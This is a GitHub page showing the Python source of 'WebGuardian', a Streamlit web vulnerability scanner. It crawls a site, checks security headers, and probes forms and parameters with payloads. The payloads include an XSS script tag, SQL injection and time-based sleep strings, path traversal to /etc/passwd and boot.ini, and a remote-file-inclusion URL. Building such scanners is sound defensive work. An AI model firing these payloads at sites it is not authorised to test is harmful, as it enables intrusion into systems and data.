-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathvulnerabilityscanner.py
More file actions
310 lines (253 loc) · 14 KB
/
vulnerabilityscanner.py
File metadata and controls
310 lines (253 loc) · 14 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
# vulnerability_scanner_gui.py
import requests
import streamlit as st
import json
import time
import argparse
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
from collections import deque
# Global state to prevent infinite loops in crawling
scanned_urls = set()
def check_insecure_headers(url, status_container):
    """
    Inspect the HTTP response headers of *url* for common security headers.

    Reports PASS/FAIL for CSP, X-Frame-Options, HSTS and
    X-Content-Type-Options, or ERROR entries when the request fails.
    Returns a list of result dictionaries.
    """
    status_container.info(f"Checking headers for: {url}")
    findings = []
    try:
        headers = requests.get(url, timeout=10).headers

        # Each entry: (report name, pass predicate, pass text, fail text).
        header_checks = [
            ("CSP",
             lambda h: 'Content-Security-Policy' in h,
             "Content-Security-Policy header found. This helps prevent XSS.",
             "Content-Security-Policy header is missing. Consider adding one to mitigate XSS."),
            ("X-Frame-Options",
             lambda h: 'X-Frame-Options' in h and h['X-Frame-Options'].lower() in ['deny', 'sameorigin'],
             "X-Frame-Options header is set correctly. This mitigates clickjacking.",
             "X-Frame-Options header is missing or insecure. This can lead to clickjacking."),
            ("HSTS",
             lambda h: 'Strict-Transport-Security' in h,
             "Strict-Transport-Security (HSTS) header found. This enforces HTTPS.",
             "Strict-Transport-Security (HSTS) header is missing. This can lead to protocol downgrade attacks."),
            ("X-Content-Type-Options",
             lambda h: 'X-Content-Type-Options' in h and h['X-Content-Type-Options'].lower() == 'nosniff',
             "X-Content-Type-Options header set to 'nosniff'. This prevents MIME type sniffing.",
             "X-Content-Type-Options header is missing. This can lead to MIME type sniffing attacks."),
        ]
        for check_name, passes, ok_text, bad_text in header_checks:
            if passes(headers):
                findings.append({"name": check_name, "status": "PASS", "description": ok_text})
            else:
                findings.append({"name": check_name, "status": "FAIL", "description": bad_text})
    except requests.exceptions.RequestException as e:
        findings.append({"name": "Headers Check", "status": "ERROR", "description": f"Failed to connect to URL: {e}"})
    except Exception as e:
        findings.append({"name": "Headers Check", "status": "ERROR", "description": f"An unexpected error occurred: {e}"})
    return findings
def check_mixed_content(url, status_container):
    """
    Basic mixed-content heuristic: flag plain-HTTP URLs.

    Returns a single result dictionary — PASS for an ``https://`` URL,
    FAIL for anything else.
    """
    status_container.info(f"Checking for mixed content for: {url}")
    is_https = url.startswith("https://")
    return {
        "name": "Mixed Content",
        "status": "PASS" if is_https else "FAIL",
        "description": (
            "The URL uses HTTPS, which is secure."
            if is_https
            else "The URL uses HTTP. This can expose user data and resources. Migrate to HTTPS."
        ),
    }
def check_forms_for_xss_and_sqli(url, status_container):
    """
    Find forms on *url* and submit reflection/SQL-error payloads to them.

    Fixes over the previous implementation:
      * inputs without a ``name`` attribute are skipped — an unnamed input
        cannot be submitted, and a ``None`` dict key breaks request encoding;
      * a form with a missing/empty ``action`` submits to the page URL
        itself (per the HTML spec) instead of being silently ignored.

    Returns a list of result dictionaries: FAIL/WARNING findings, an INFO
    entry when no forms exist, or ERROR entries on request failure.
    """
    status_container.info(f"Checking forms for XSS and SQLi on: {url}")
    results = []
    xss_payloads = ['"><script>alert(1)</script>']
    sqli_payloads = ["' OR '1'='1"]
    try:
        response = requests.get(url, timeout=10)
        soup = BeautifulSoup(response.text, 'html.parser')
        forms = soup.find_all('form')
        if not forms:
            results.append({"name": "Form Scan", "status": "INFO", "description": "No forms found on the page."})
        for form in forms:
            # Per the HTML spec, a missing/empty action submits to the page itself.
            action_url = form.get('action')
            full_action_url = urljoin(url, action_url) if action_url else url
            method = form.get('method', 'get').lower()
            inputs = form.find_all('input', {'type': ['text', 'password', 'hidden']})
            # Only named inputs are submitted; a None key would break encoding.
            form_data = {inp.get('name'): 'test' for inp in inputs if inp.get('name')}

            def _submit(data):
                # Honor the form's declared method; default is GET.
                if method == 'post':
                    return requests.post(full_action_url, data=data, timeout=10)
                return requests.get(full_action_url, params=data, timeout=10)

            # Test with XSS payloads: a reflected payload suggests XSS.
            for payload in xss_payloads:
                for name in form_data:
                    temp_data = form_data.copy()
                    temp_data[name] = payload
                    res = _submit(temp_data)
                    if payload in res.text:
                        results.append({"name": "Form XSS", "status": "FAIL", "description": f"Potential XSS vulnerability found in form at {full_action_url} with payload {payload}"})
            # Test with SQLi payloads: database error strings suggest injection.
            for payload in sqli_payloads:
                for name in form_data:
                    temp_data = form_data.copy()
                    temp_data[name] = payload
                    res = _submit(temp_data)
                    if "syntax error" in res.text.lower() or "mysql" in res.text.lower():
                        results.append({"name": "Form SQLi", "status": "WARNING", "description": f"Possible SQL injection vulnerability in form at {full_action_url} with payload {payload}"})
    except requests.exceptions.RequestException as e:
        results.append({"name": "Form Scan", "status": "ERROR", "description": f"Failed to check forms: {e}"})
    except Exception as e:
        results.append({"name": "Form Scan", "status": "ERROR", "description": f"An unexpected error occurred during form scan: {e}"})
    return results
def check_time_based_sqli(url, status_container):
    """
    Probe *url* for time-based SQL injection using SLEEP/pg_sleep payloads.

    A baseline request is timed first; a payload request that takes more
    than baseline + 3 seconds is reported as a potential vulnerability.

    Fix over the previous implementation: the injected ``id`` parameter is
    appended with ``&`` when the URL already carries a query string, rather
    than producing an invalid second ``?``.

    Returns a list of result dictionaries (PASS/FAIL per payload, or ERROR).
    """
    status_container.info(f"Checking for time-based SQLi for: {url}")
    time_based_payloads = [
        "' OR 1=1 AND SLEEP(5)--",
        "' OR 1=1 AND pg_sleep(5)--"
    ]
    results = []
    # Use the right separator when the URL already has a query string.
    separator = '&' if '?' in url else '?'
    try:
        # Get baseline response time
        start_time = time.time()
        requests.get(url, timeout=10)
        baseline_time = time.time() - start_time
        for payload in time_based_payloads:
            test_url = f"{url}{separator}id={requests.utils.quote(payload)}"
            start_time = time.time()
            requests.get(test_url, timeout=10)
            elapsed_time = time.time() - start_time
            # 3-second buffer over baseline avoids flagging normal jitter.
            if elapsed_time > baseline_time + 3:
                results.append({"name": "Time-based SQLi", "status": "FAIL", "description": f"Potential time-based SQL injection vulnerability found. Request with payload took {elapsed_time:.2f}s, compared to baseline of {baseline_time:.2f}s."})
            else:
                results.append({"name": "Time-based SQLi", "status": "PASS", "description": f"No obvious time-based SQL injection vulnerability found with payload '{payload}'."})
    except requests.exceptions.RequestException as e:
        results.append({"name": "Time-based SQLi", "status": "ERROR", "description": f"Failed to perform time-based SQLi check: {e}"})
    except Exception as e:
        results.append({"name": "Time-based SQLi", "status": "ERROR", "description": f"An unexpected error occurred: {e}"})
    return results
def check_file_inclusion(url, status_container):
    """
    Check *url* for Local/Remote File Inclusion via a ``file`` parameter.

    LFI is detected by known file-content markers ("root:" for /etc/passwd,
    "[boot loader]" for boot.ini); RFI is only a heuristic here — a 200
    response to a remote-URL payload is reported as WARNING for follow-up.

    Fixes over the previous implementation:
      * the ``file`` parameter is appended with ``&`` when the URL already
        has a query string, instead of a second ``?``;
      * deeper ``../../../../`` traversal payloads are included — a single
        ``../`` rarely escapes the web root.

    Returns a list of result dictionaries (PASS/FAIL/WARNING per payload,
    or ERROR entries when the requests fail).
    """
    status_container.info(f"Checking for file inclusion vulnerabilities for: {url}")
    lfi_payloads = [
        "../etc/passwd",
        "..\\boot.ini",
        # Deeper traversal: one level rarely escapes the document root.
        "../../../../etc/passwd",
        "..\\..\\..\\..\\boot.ini",
    ]
    rfi_payloads = ["http://example.com/malicious.php"]
    results = []
    # Use the right separator when the URL already has a query string.
    separator = '&' if '?' in url else '?'
    try:
        for payload in lfi_payloads:
            test_url = f"{url}{separator}file={requests.utils.quote(payload)}"
            response = requests.get(test_url, timeout=10)
            if "root:" in response.text or "[boot loader]" in response.text:
                results.append({"name": "LFI", "status": "FAIL", "description": f"Potential LFI vulnerability found. Server responded with contents of '{payload}'."})
            else:
                results.append({"name": "LFI", "status": "PASS", "description": f"No obvious LFI vulnerability found with payload '{payload}'."})
        for payload in rfi_payloads:
            test_url = f"{url}{separator}file={requests.utils.quote(payload)}"
            response = requests.get(test_url, timeout=10)
            # A real check would involve setting up a listener. Here, we just check for a response.
            if response.status_code == 200:
                results.append({"name": "RFI", "status": "WARNING", "description": f"Potential RFI vulnerability. The server accepted a remote file inclusion payload. Further testing is needed."})
            else:
                results.append({"name": "RFI", "status": "PASS", "description": f"No obvious RFI vulnerability found with payload '{payload}'."})
    except requests.exceptions.RequestException as e:
        results.append({"name": "File Inclusion", "status": "ERROR", "description": f"Failed to perform file inclusion checks: {e}"})
    except Exception as e:
        results.append({"name": "File Inclusion", "status": "ERROR", "description": f"An unexpected error occurred: {e}"})
    return results
def crawl_and_scan(start_url, max_depth, status_container):
    """
    Breadth-first crawl of *start_url* up to *max_depth* link hops, running
    every vulnerability check on each same-domain page discovered.

    Fixes over the previous implementation:
      * URL fragments are stripped before de-duplication, so ``page#a`` and
        ``page#b`` are no longer scanned as two separate pages;
      * only ``http``/``https`` links are queued;
      * the start URL's netloc is computed once instead of per link.

    Uses the module-level ``scanned_urls`` set to avoid re-visiting pages.
    Returns the combined list of finding dictionaries from all checks.
    """
    global scanned_urls
    to_scan = deque([(start_url, 0)])
    all_results = []
    scanned_urls.add(start_url)
    status_container.info(f"Starting crawl and scan on {start_url}...")
    start_netloc = urlparse(start_url).netloc  # loop-invariant, hoisted
    while to_scan:
        current_url, depth = to_scan.popleft()
        if depth > max_depth:
            continue
        status_container.info(f"Scanning URL: {current_url} (Depth: {depth})")
        try:
            response = requests.get(current_url, timeout=10)
            soup = BeautifulSoup(response.text, 'html.parser')
            # Run all checks on the current URL
            all_results.extend(check_insecure_headers(current_url, status_container))
            all_results.append(check_mixed_content(current_url, status_container))
            all_results.extend(check_forms_for_xss_and_sqli(current_url, status_container))
            all_results.extend(check_time_based_sqli(current_url, status_container))
            all_results.extend(check_file_inclusion(current_url, status_container))
            # Find new links to scan
            for link in soup.find_all('a', href=True):
                # Drop the fragment: page#a and page#b are the same resource.
                absolute_url = urljoin(current_url, link['href']).split('#', 1)[0]
                parsed = urlparse(absolute_url)
                # Queue only same-domain http(s) links not seen before.
                if (parsed.scheme in ('http', 'https')
                        and parsed.netloc == start_netloc
                        and absolute_url not in scanned_urls):
                    to_scan.append((absolute_url, depth + 1))
                    scanned_urls.add(absolute_url)
        except requests.exceptions.RequestException as e:
            all_results.append({"name": "Crawl Error", "status": "ERROR", "description": f"Failed to crawl {current_url}: {e}"})
        except Exception as e:
            all_results.append({"name": "Crawl Error", "status": "ERROR", "description": f"An unexpected error occurred during crawl: {e}"})
    return all_results
def display_results(results):
    """Render the scan findings in Streamlit: a summary block, then one styled line per finding."""
    st.subheader("Scan Report")
    if not results:
        st.info("No vulnerabilities found or scan failed.")
        return
    # Tally findings per status for the summary block.
    status_counts = {}
    for entry in results:
        key = entry.get("status")
        status_counts[key] = status_counts.get(key, 0) + 1
    st.markdown(f"""
    **Total Findings**: {len(results)}
    **Passing Checks**: {status_counts.get("PASS", 0)}
    **Failures**: {status_counts.get("FAIL", 0)}
    **Warnings**: {status_counts.get("WARNING", 0)}
    **Informational**: {status_counts.get("INFO", 0)}
    **Errors**: {status_counts.get("ERROR", 0)}
    """)
    # Map each status to its Streamlit renderer and icon; anything else
    # (i.e. INFO) falls through to the informational style.
    renderers = {
        "PASS": (st.success, "✅"),
        "FAIL": (st.error, "❌"),
        "WARNING": (st.warning, "⚠️"),
        "ERROR": (st.error, "🛑"),
    }
    for entry in results:
        render, icon = renderers.get(entry.get("status"), (st.info, "ℹ️"))
        render(f"{icon} {entry.get('name')}: {entry.get('description')}")
# --- Streamlit page: input widgets, scan trigger, and report output. ---
st.title("WebGuardian: Web Vulnerability Scanner")
st.markdown("Enter a URL to perform a comprehensive security scan.")

target_url = st.text_input("Target URL", "https://example.com")
crawl_depth = st.slider("Maximum Crawl Depth", 0, 5, 2)

if st.button("Start Scan"):
    if not target_url:
        st.error("Please enter a valid URL.")
    else:
        # Reset the global de-duplication set so a new scan starts fresh.
        scanned_urls.clear()
        st.subheader("Live Scan Status")
        status_container = st.container()
        # One spinner covers the whole crawl-and-scan run.
        with st.spinner("Scanning... this may take a moment."):
            findings = crawl_and_scan(target_url, crawl_depth, status_container)
        display_results(findings)
        # Persist the full report to disk alongside the on-screen view.
        report_path = "scan_report.json"
        with open(report_path, 'w') as report_file:
            json.dump(findings, report_file, indent=4)
        st.success(f"Scan complete! A detailed JSON report has been saved to '{report_path}'.")